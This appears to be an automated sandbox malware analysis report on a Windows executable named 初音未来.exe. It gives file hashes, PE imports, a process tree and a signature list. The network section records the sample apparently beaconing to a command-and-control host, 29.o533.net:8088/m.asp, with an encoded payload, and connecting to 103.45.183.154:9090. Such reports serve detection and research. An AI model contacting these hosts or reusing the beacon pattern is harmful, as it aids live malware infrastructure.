Analysis Task

Analysis Type  VM Label  Start Time  End Time  Duration
File (Windows) win7-sp1-x64-hpdapp01-1 2020-09-25 19:28:45 2020-09-25 19:31:22 157 seconds

Maldun Score

10.0

Dangerous

File Details

File name 初音未来.exe
File size 11112448 bytes
File type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 69b600483ef2bb1e9ceb5205ada22f20
SHA1 e471f5b7f819f3bdd4c5753778c03b01ff9b9208
SHA256 e61945e5f6c10cfeae902d6b5f95f96e1e342d19a2bc5edccae544cd7665d026
SHA512 d7352cced657424b667a91686cb46bcf56af7efdcdf3862f56a528090e67c3fe4bb378bb2f4f535f8ec6de1d070420144e7779c4a4ef983e065b77f9fce3aff8
CRC32 4A793D71
Ssdeep 196608:S7JZDqNOoyxDqvIhzLJ3GZcodJqzGx+Mlnj9Y2+aM5x5w:S7LqNOoGDRLJ3mcGwTMlj97Uxa

Runtime Screenshots


Hosts Accessed

No host records.

Domain Resolution

Domain  Security Rating  Response
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net.0.1.cn.akamaitech.net
CNAME a1983.dscd.akamai.net
A 23.35.98.32
A 23.35.98.25
29.o533.net A 221.229.162.40

PE Information

Image base 0x00400000
Entry point 0x0049607d
Declared checksum 0x00000000
Actual checksum 0x00aa3be1
Minimum OS version required 4.0
Compile time 2020-09-25 19:25:26
Import hash c562e5c0b310365e3e08b0ac583da40f

Version Information

LegalCopyright
FileVersion
CompanyName
Comments
ProductName
ProductVersion
FileDescription
Translation

PE Sections

Name  Virtual Address  Virtual Size  Raw Data Size  Characteristics  Entropy
.text 0x00001000 0x000b5b6a 0x000b6000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.55
.rdata 0x000b7000 0x009c3012 0x009c4000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 7.91
.data 0x00a7b000 0x00049fa8 0x00018000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.01
.rsrc 0x00ac5000 0x000054f8 0x00006000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.05

Imports

Library: KERNEL32.dll:
0x4b7170 GetLocalTime
0x4b7174 GetSystemTime
0x4b717c RtlUnwind
0x4b7180 GetStartupInfoA
0x4b7184 GetOEMCP
0x4b7188 GetCPInfo
0x4b718c GetProcessVersion
0x4b7190 SetErrorMode
0x4b7194 GlobalFlags
0x4b7198 GetCurrentThread
0x4b719c GetFileTime
0x4b71a0 RaiseException
0x4b71a4 TlsGetValue
0x4b71a8 LocalReAlloc
0x4b71ac TlsSetValue
0x4b71b0 TlsFree
0x4b71b4 GlobalHandle
0x4b71b8 TlsAlloc
0x4b71bc LocalAlloc
0x4b71c0 lstrcmpA
0x4b71c4 GetVersion
0x4b71c8 GlobalGetAtomNameA
0x4b71cc GlobalAddAtomA
0x4b71d0 GlobalFindAtomA
0x4b71d4 GlobalDeleteAtom
0x4b71d8 lstrcmpiA
0x4b71dc SetEndOfFile
0x4b71e0 UnlockFile
0x4b71e4 LockFile
0x4b71e8 FlushFileBuffers
0x4b71ec SetFilePointer
0x4b71f0 GetCurrentProcess
0x4b71f4 DuplicateHandle
0x4b71f8 lstrcpynA
0x4b71fc SetLastError
0x4b7208 LocalFree
0x4b7214 TerminateProcess
0x4b7218 HeapSize
0x4b721c GetACP
0x4b7234 SetHandleCount
0x4b7238 GetStdHandle
0x4b723c GetFileType
0x4b7244 HeapDestroy
0x4b7248 HeapCreate
0x4b724c VirtualFree
0x4b7254 LCMapStringA
0x4b7258 LCMapStringW
0x4b725c VirtualAlloc
0x4b7260 IsBadWritePtr
0x4b7264 GetStringTypeA
0x4b7268 GetStringTypeW
0x4b7270 CompareStringA
0x4b7274 CompareStringW
0x4b7278 IsBadReadPtr
0x4b727c IsBadCodePtr
0x4b7280 SetStdHandle
0x4b7284 SuspendThread
0x4b7288 ReleaseMutex
0x4b728c CreateMutexA
0x4b7290 TerminateThread
0x4b7294 CreateSemaphoreA
0x4b7298 ResumeThread
0x4b729c ReleaseSemaphore
0x4b72a8 GetProfileStringA
0x4b72ac WriteFile
0x4b72b4 CreateFileA
0x4b72b8 SetEvent
0x4b72bc FindResourceA
0x4b72c0 LoadResource
0x4b72c4 LockResource
0x4b72c8 ReadFile
0x4b72cc lstrlenW
0x4b72d0 GetModuleFileNameA
0x4b72d4 WideCharToMultiByte
0x4b72d8 MultiByteToWideChar
0x4b72dc GetCurrentThreadId
0x4b72e0 ExitProcess
0x4b72e4 GlobalSize
0x4b72e8 GlobalFree
0x4b72f4 lstrcatA
0x4b72f8 lstrlenA
0x4b72fc CloseHandle
0x4b7300 WinExec
0x4b7304 lstrcpyA
0x4b7308 FindNextFileA
0x4b730c GlobalReAlloc
0x4b7310 HeapFree
0x4b7314 HeapReAlloc
0x4b7318 GetProcessHeap
0x4b731c HeapAlloc
0x4b7320 GetUserDefaultLCID
0x4b7324 GetFullPathNameA
0x4b7328 FreeLibrary
0x4b732c LoadLibraryA
0x4b7330 GetLastError
0x4b7334 GetVersionExA
0x4b733c CreateThread
0x4b7340 CreateEventA
0x4b7344 Sleep
0x4b7348 GlobalAlloc
0x4b734c GlobalLock
0x4b7350 GlobalUnlock
0x4b7354 FindFirstFileA
0x4b7358 FindClose
0x4b735c SetFileAttributesA
0x4b7360 GetFileAttributesA
0x4b7364 DeleteFileA
0x4b7370 GetModuleHandleA
0x4b7374 GetProcAddress
0x4b7378 MulDiv
0x4b737c GetCommandLineA
0x4b7380 GetTickCount
0x4b7384 CreateProcessA
0x4b7388 WaitForSingleObject
0x4b738c GetFileSize
Library: USER32.dll:
0x4b73c8 LoadIconA
0x4b73cc TranslateMessage
0x4b73d0 DrawFrameControl
0x4b73d4 DrawEdge
0x4b73d8 DrawFocusRect
0x4b73dc WindowFromPoint
0x4b73e0 GetMessageA
0x4b73e4 DispatchMessageA
0x4b73e8 SetRectEmpty
0x4b73f8 DrawIconEx
0x4b73fc CreatePopupMenu
0x4b7400 AppendMenuA
0x4b7404 ModifyMenuA
0x4b7408 CreateMenu
0x4b7410 GetDlgCtrlID
0x4b7414 GetSubMenu
0x4b7418 EnableMenuItem
0x4b741c ClientToScreen
0x4b7424 LoadImageA
0x4b742c ShowWindow
0x4b7430 IsWindowEnabled
0x4b7438 GetKeyState
0x4b7440 PostQuitMessage
0x4b7444 IsZoomed
0x4b7448 GetClassInfoA
0x4b744c DefWindowProcA
0x4b7450 GetSystemMenu
0x4b7454 DeleteMenu
0x4b7458 GetMenu
0x4b745c SetMenu
0x4b7460 PeekMessageA
0x4b7464 IsIconic
0x4b7468 SetFocus
0x4b746c GetActiveWindow
0x4b7470 GetWindow
0x4b7478 SetWindowRgn
0x4b747c GetMessagePos
0x4b7480 ScreenToClient
0x4b7488 CopyRect
0x4b748c LoadBitmapA
0x4b7490 WinHelpA
0x4b7494 KillTimer
0x4b7498 SetTimer
0x4b749c ReleaseCapture
0x4b74a0 GetCapture
0x4b74a4 SetCapture
0x4b74a8 GetScrollRange
0x4b74ac SetScrollRange
0x4b74b0 SetScrollPos
0x4b74b4 SetRect
0x4b74b8 InflateRect
0x4b74bc IntersectRect
0x4b74c0 DestroyIcon
0x4b74c4 PtInRect
0x4b74c8 OffsetRect
0x4b74cc IsWindowVisible
0x4b74d0 EnableWindow
0x4b74d4 UnregisterClassA
0x4b74d8 GetWindowLongA
0x4b74dc SetWindowLongA
0x4b74e0 GetSysColor
0x4b74e4 SetActiveWindow
0x4b74e8 SetCursorPos
0x4b74ec LoadCursorA
0x4b74f0 SetCursor
0x4b74f4 GetDC
0x4b74f8 FillRect
0x4b74fc IsRectEmpty
0x4b7500 ReleaseDC
0x4b7504 IsChild
0x4b7508 DestroyMenu
0x4b750c SetForegroundWindow
0x4b7510 GetWindowRect
0x4b7514 EqualRect
0x4b7518 UpdateWindow
0x4b751c ValidateRect
0x4b7520 InvalidateRect
0x4b7524 GetClientRect
0x4b7528 GetFocus
0x4b752c GetParent
0x4b7530 GetTopWindow
0x4b7534 PostMessageA
0x4b7538 IsWindow
0x4b753c SetParent
0x4b7540 DestroyCursor
0x4b7544 SendMessageA
0x4b7548 SetWindowPos
0x4b754c GetWindowTextA
0x4b7554 CharUpperA
0x4b7558 GetWindowDC
0x4b755c BeginPaint
0x4b7560 EndPaint
0x4b7564 TabbedTextOutA
0x4b7568 DrawTextA
0x4b756c GrayStringA
0x4b7570 GetDlgItem
0x4b7574 DestroyWindow
0x4b757c EndDialog
0x4b7580 GetNextDlgTabItem
0x4b7584 GetWindowPlacement
0x4b758c GetForegroundWindow
0x4b7590 GetLastActivePopup
0x4b7594 GetMessageTime
0x4b7598 RemovePropA
0x4b759c CallWindowProcA
0x4b75a0 GetPropA
0x4b75a4 UnhookWindowsHookEx
0x4b75a8 SetPropA
0x4b75ac GetClassLongA
0x4b75b0 CallNextHookEx
0x4b75b4 SetWindowsHookExA
0x4b75b8 CreateWindowExA
0x4b75bc GetMenuItemID
0x4b75c0 GetMenuItemCount
0x4b75c4 RegisterClassA
0x4b75c8 GetScrollPos
0x4b75cc AdjustWindowRectEx
0x4b75d0 MapWindowPoints
0x4b75d4 SendDlgItemMessageA
0x4b75d8 ScrollWindowEx
0x4b75dc IsDialogMessageA
0x4b75e0 SetWindowTextA
0x4b75e4 MoveWindow
0x4b75e8 CheckMenuItem
0x4b75ec SetMenuItemBitmaps
0x4b75f0 GetMenuState
0x4b75f8 GetClassNameA
0x4b75fc GetDesktopWindow
0x4b7600 LoadStringA
0x4b7604 GetSysColorBrush
0x4b7608 MessageBoxA
0x4b760c GetCursorPos
0x4b7610 GetSystemMetrics
0x4b7614 EmptyClipboard
0x4b7618 SetClipboardData
0x4b761c OpenClipboard
0x4b7620 GetClipboardData
0x4b7624 CloseClipboard
0x4b7628 wsprintfA
0x4b762c WaitForInputIdle
0x4b7630 RedrawWindow
Library: GDI32.dll:
0x4b7024 GetTextMetricsA
0x4b7028 ExtTextOutA
0x4b702c TextOutA
0x4b7030 RectVisible
0x4b7034 PtVisible
0x4b7038 GetViewportExtEx
0x4b703c Escape
0x4b7040 ExtSelectClipRgn
0x4b7044 SetBkColor
0x4b704c SetStretchBltMode
0x4b7050 GetClipRgn
0x4b7054 CreatePolygonRgn
0x4b7058 SelectClipRgn
0x4b705c DeleteObject
0x4b7060 CreateDIBitmap
0x4b7068 CreatePalette
0x4b706c StretchBlt
0x4b7070 SelectPalette
0x4b7074 RealizePalette
0x4b7078 GetDIBits
0x4b707c GetWindowExtEx
0x4b7080 GetViewportOrgEx
0x4b7084 GetWindowOrgEx
0x4b7088 BeginPath
0x4b708c EndPath
0x4b7090 PathToRegion
0x4b7094 CreateEllipticRgn
0x4b7098 CreateRoundRectRgn
0x4b709c GetTextColor
0x4b70a0 GetBkMode
0x4b70a4 GetBkColor
0x4b70a8 GetROP2
0x4b70ac GetStretchBltMode
0x4b70b0 GetPolyFillMode
0x4b70b8 CreateDCA
0x4b70bc CreateBitmap
0x4b70c0 SelectObject
0x4b70c4 CreatePen
0x4b70c8 PatBlt
0x4b70cc ScaleViewportExtEx
0x4b70d0 SetViewportExtEx
0x4b70d4 OffsetViewportOrgEx
0x4b70d8 SetViewportOrgEx
0x4b70dc SetMapMode
0x4b70e0 SetTextColor
0x4b70e4 SetROP2
0x4b70e8 SetPolyFillMode
0x4b70ec SetBkMode
0x4b70f0 RestoreDC
0x4b70f4 SaveDC
0x4b70f8 CombineRgn
0x4b70fc CreateRectRgn
0x4b7100 FillRgn
0x4b7104 CreateSolidBrush
0x4b7108 CreateFontIndirectA
0x4b710c GetStockObject
0x4b7110 GetObjectA
0x4b7114 EndPage
0x4b7118 EndDoc
0x4b711c DeleteDC
0x4b7120 StartDocA
0x4b7124 StartPage
0x4b7128 BitBlt
0x4b712c CreateCompatibleDC
0x4b7130 Ellipse
0x4b7134 Rectangle
0x4b7138 LPtoDP
0x4b713c DPtoLP
0x4b7140 GetCurrentObject
0x4b7144 RoundRect
0x4b714c GetDeviceCaps
0x4b7150 LineTo
0x4b7154 MoveToEx
0x4b7158 ExcludeClipRect
0x4b715c GetClipBox
0x4b7160 ScaleWindowExtEx
0x4b7164 SetWindowExtEx
0x4b7168 SetWindowOrgEx
Library: WINMM.dll:
0x4b7640 waveOutWrite
0x4b7644 waveOutPause
0x4b7648 waveOutReset
0x4b764c waveOutClose
0x4b7650 waveOutGetNumDevs
0x4b7654 waveOutOpen
0x4b765c midiStreamOpen
0x4b7660 midiStreamProperty
0x4b7668 midiStreamOut
0x4b766c waveOutRestart
0x4b7670 midiStreamStop
0x4b7674 midiOutReset
0x4b7678 midiStreamClose
0x4b767c midiStreamRestart
Library: WINSPOOL.DRV:
0x4b7684 OpenPrinterA
0x4b7688 DocumentPropertiesA
0x4b768c ClosePrinter
Library: ADVAPI32.dll:
0x4b7000 RegCloseKey
0x4b7004 RegOpenKeyExA
0x4b7008 RegSetValueExA
0x4b700c RegQueryValueA
0x4b7010 RegCreateKeyExA
Library: SHELL32.dll:
0x4b73bc ShellExecuteA
0x4b73c0 Shell_NotifyIconA
Library: ole32.dll:
0x4b76d4 CLSIDFromProgID
0x4b76d8 OleRun
0x4b76dc CoCreateInstance
0x4b76e0 CLSIDFromString
0x4b76e4 OleUninitialize
0x4b76e8 OleInitialize
Library: OLEAUT32.dll:
0x4b7394 VariantCopyInd
0x4b7398 VariantInit
0x4b739c SysAllocString
0x4b73a0 RegisterTypeLib
0x4b73a4 LHashValOfNameSys
0x4b73a8 LoadTypeLib
0x4b73ac UnRegisterTypeLib
0x4b73b0 VariantChangeType
0x4b73b4 VariantClear
Library: COMCTL32.dll:
0x4b7018 ImageList_Destroy
0x4b701c None
Library: WS2_32.dll:
0x4b7694 inet_ntoa
0x4b7698 WSACleanup
0x4b769c ntohl
0x4b76a0 accept
0x4b76a4 getpeername
0x4b76a8 recv
0x4b76ac ioctlsocket
0x4b76b0 recvfrom
0x4b76b4 closesocket
0x4b76b8 WSAAsyncSelect
Library: comdlg32.dll:
0x4b76c0 ChooseColorA
0x4b76c4 GetOpenFileNameA
0x4b76c8 GetSaveFileNameA
0x4b76cc GetFileTitleA

.text
`.rdata
@.data
.rsrc
8`}<j
T$hVj
DRQPj
T$|Vj
T$th
|$TVj
jjjjh
No antivirus engine scan information!

Process Tree

____________.exe, PID: 2504, parent PID: 2224
QQbrowserQQbrowserQQbrowser.bat, PID: 2568, parent PID: 2504

TCP

Source Address  Source Port  Destination Address  Destination Port
192.168.122.201 49162 103.45.183.154 9090
192.168.122.201 49165 103.45.183.154 9090
192.168.122.201 49168 103.45.183.154 9090
192.168.122.201 49163 221.229.162.40 29.o533.net 8088
192.168.122.201 49158 23.35.98.32 acroipm.adobe.com 80

UDP

Source Address  Source Port  Destination Address  Destination Port
192.168.122.201 61084 192.168.122.1 53
192.168.122.201 63282 192.168.122.1 53

HTTP Requests

URI  HTTP Data
http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

http://29.o533.net:8088/m.asp?code=fgBIBBgGDBOBBBBBKNSb9HKelOzhkyrU0vks4OGIsgRHt6m8DPC4gLym6Am7lV6knNlFVOG8ngFhsTBHmvlwJeLiqca5b0RbhkeNSKoWIvPo9nYZ91A%%2bUEXG%%2bTE5yAP2HU2rDqCXWxQjkqgeR03/i3QbyW4u6CrYHoWRextvJD14VbKmJxfz2cH0edNrRLTgxzT7t2j1ZPHWEnaPSApjYqx0ZVJPHXy%%2b5pTK9tO90o4PfOAdJnmZwFHIUX%%2bMu/HEmVW%%2bnjXo8MTRzILW--23143
GET /m.asp?code=fgBIBBgGDBOBBBBBKNSb9HKelOzhkyrU0vks4OGIsgRHt6m8DPC4gLym6Am7lV6knNlFVOG8ngFhsTBHmvlwJeLiqca5b0RbhkeNSKoWIvPo9nYZ91A%%2bUEXG%%2bTE5yAP2HU2rDqCXWxQjkqgeR03/i3QbyW4u6CrYHoWRextvJD14VbKmJxfz2cH0edNrRLTgxzT7t2j1ZPHWEnaPSApjYqx0ZVJPHXy%%2b5pTK9tO90o4PfOAdJnmZwFHIUX%%2bMu/HEmVW%%2bnjXo8MTRzILW--23143 HTTP/1.0
Host: 29.o533.net

SMTP Traffic

No SMTP traffic.

IRC Traffic

No IRC requests.

ICMP Traffic

Source Address  Destination Address  ICMP Type  Data
192.168.1.1 192.168.122.201 3
192.168.1.1 192.168.122.201 3

CIF Report

No CIF results

Network Alerts

No alerts

TLS

No TLS

Suricata HTTP

No Suricata HTTP

No network-extracted files found
Sorry! No files were dropped.
No similar analyses found.

Processing ( 61.246 seconds )

  • 29.286 Static
  • 16.048 Suricata
  • 7.06 BehaviorAnalysis
  • 2.996 TargetInfo
  • 2.75 VirusTotal
  • 2.494 NetworkAnalysis
  • 0.447 peid
  • 0.111 AnalysisInfo
  • 0.035 config_decoder
  • 0.016 Strings
  • 0.003 Memory

Signatures ( 44.135 seconds )

  • 39.116 network_http
  • 1.916 md_url_bl
  • 0.321 api_spamming
  • 0.305 maldun_anomaly_massive_file_ops
  • 0.257 stealth_timeout
  • 0.217 stealth_decoy_document
  • 0.129 stealth_file
  • 0.126 virus
  • 0.124 reads_self
  • 0.123 antivm_generic_disk
  • 0.109 mimics_filetime
  • 0.108 bootkit
  • 0.103 rat_luminosity
  • 0.093 maldun_malicious_write_executeable_under_temp_to_regrun
  • 0.087 maldun_anomaly_write_exe_and_dll_under_winroot_run
  • 0.083 maldun_anomaly_write_exe_and_obsfucate_extension
  • 0.082 ransomware_extensions
  • 0.056 antiav_detectfile
  • 0.056 antiav_detectreg
  • 0.051 kovter_behavior
  • 0.045 antiemu_wine_func
  • 0.043 infostealer_browser_password
  • 0.043 infostealer_bitcoin
  • 0.037 infostealer_ftp
  • 0.03 hawkeye_behavior
  • 0.028 dridex_behavior
  • 0.028 ransomware_files
  • 0.026 md_domain_bl
  • 0.022 infostealer_im
  • 0.021 antivm_vbox_files
  • 0.017 antisandbox_sleep
  • 0.016 kazybot_behavior
  • 0.015 stealth_network
  • 0.014 infostealer_mail
  • 0.013 antivm_vbox_libs
  • 0.013 shifu_behavior
  • 0.012 anomaly_persistence_autorun
  • 0.012 antidbg_windows
  • 0.012 antianalysis_detectreg
  • 0.012 antidbg_devices
  • 0.011 dead_connect
  • 0.008 tinba_behavior
  • 0.008 betabot_behavior
  • 0.008 geodo_banking_trojan
  • 0.007 network_tor
  • 0.007 exec_crash
  • 0.006 antisandbox_sunbelt_libs
  • 0.006 ispy_behavior
  • 0.006 network_torgateway
  • 0.005 rat_nanocore
  • 0.005 antiav_avast_libs
  • 0.005 kibex_behavior
  • 0.005 hancitor_behavior
  • 0.005 antianalysis_detectfile
  • 0.005 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.005 rat_pcclient
  • 0.004 antisandbox_sboxie_libs
  • 0.004 antiav_bitdefender_libs
  • 0.003 andromeda_behavior
  • 0.003 antivm_vmware_libs
  • 0.003 injection_createremotethread
  • 0.003 vawtrak_behavior
  • 0.003 cerber_behavior
  • 0.003 sniffer_winpcap
  • 0.003 antivm_parallels_keys
  • 0.003 antivm_vmware_files
  • 0.003 antivm_xen_keys
  • 0.003 disables_browser_warn
  • 0.003 codelux_behavior
  • 0.003 network_tor_service
  • 0.002 antivm_generic_services
  • 0.002 antivm_vbox_window
  • 0.002 antivm_generic_scsi
  • 0.002 antivm_vmware_events
  • 0.002 anormaly_invoke_kills
  • 0.002 injection_runpe
  • 0.002 antisandbox_fortinet_files
  • 0.002 antisandbox_threattrack_files
  • 0.002 antivm_generic_diskreg
  • 0.002 browser_security
  • 0.002 modify_proxy
  • 0.002 darkcomet_regkeys
  • 0.002 malicous_targeted_flame
  • 0.002 md_bad_drop
  • 0.002 network_cnc_http
  • 0.002 recon_fingerprint
  • 0.001 infostealer_browser
  • 0.001 Locky_behavior
  • 0.001 ursnif_behavior
  • 0.001 antisandbox_script_timer
  • 0.001 cryptowall_behavior
  • 0.001 bypass_firewall
  • 0.001 spreading_autoruninf
  • 0.001 modifies_hostfile
  • 0.001 antisandbox_cuckoo_files
  • 0.001 antisandbox_productid
  • 0.001 antisandbox_joe_anubis_files
  • 0.001 antisandbox_sunbelt_files
  • 0.001 antivm_generic_system
  • 0.001 antivm_xen_keys
  • 0.001 antivm_hyperv_keys
  • 0.001 antivm_vbox_acpi
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vbox_keys
  • 0.001 antivm_vmware_keys
  • 0.001 antivm_vpc_files
  • 0.001 antivm_vpc_keys
  • 0.001 banker_cridex
  • 0.001 banker_zeus_mutex
  • 0.001 bitcoin_opencl
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 disables_system_restore
  • 0.001 disables_windows_defender
  • 0.001 maldun_anomaly_invoke_vb_vba
  • 0.001 maldun_network_blacklist
  • 0.001 office_security
  • 0.001 packer_armadillo_regkey
  • 0.001 ransomware_radamant
  • 0.001 rat_spynet
  • 0.001 stealth_modify_uac_prompt

Reporting ( 1.74 seconds )

  • 1.12 ReportHTMLSummary
  • 0.62 Malheur
Task ID 577684
Mongo ID 5f6dd5af2f8f2e0ab852d05a
Cuckoo release 1.4-Maldun